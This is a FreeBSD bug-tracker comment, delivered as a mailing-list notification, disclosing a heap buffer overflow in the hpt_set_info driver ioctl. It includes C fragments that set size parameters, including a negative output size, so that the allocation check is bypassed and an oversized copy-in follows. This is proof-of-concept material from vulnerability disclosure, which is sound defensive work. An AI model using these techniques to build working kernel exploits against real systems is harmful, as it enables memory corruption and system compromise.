[Bug 206585] hpt_set_info possible buffer overflow

Mon Jan 25 19:38:35 UTC 2016

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206585

--- Comment #4 from CTurt <ecturt at gmail.com> ---
Supplying the `HPT_IOCTL_GET_EVENT` command will ensure that
`Kernel_DeviceIoControl` function instantly returns, resulting in
`hpt_set_info` returning straight after doing the `malloc`, `copyin`, and
`free`:

        case HPT_IOCTL_GET_EVENT:
                {
                        PHPT_EVENT pInfo;

                        if (nInBufferSize!=0) return -1;

I've also refined the `size` related parameters needed to fully control the
heap overflow:

        params.dwIoControlCode = HPT_IOCTL_GET_EVENT;
        params.lpInBuffer = mapping;
        params.nInBufferSize = bufferSize + overflowSize;
        params.lpOutBuffer = NULL;
        params.nOutBufferSize = -overflowSize;
        params.lpBytesReturned = &bytesReturned;

        printf("  [+] nInBufferSize (size copied in): %08x\n",
params.nInBufferSize);
        printf("  [+] nOutBufferSize: %08x\n", params.nOutBufferSize);
        printf("  [+] Sum (allocation size): %08x\n", params.nInBufferSize +
params.nOutBufferSize);
        printf("  [+] Will be accepted: %d\n", (params.nInBufferSize +
params.nOutBufferSize) <= PAGE_SIZE);

You can get very manageable sizes from this, for example, allocated
`bufferSize` of `0x500`, and copy size of `0x1000`.

I'll try to get around to writing a full exploit for this soon, but won't be
very useful since the vulnerability is only triggerable as `root` anyway.

-- 
You are receiving this mail because:
You are the assignee for the bug.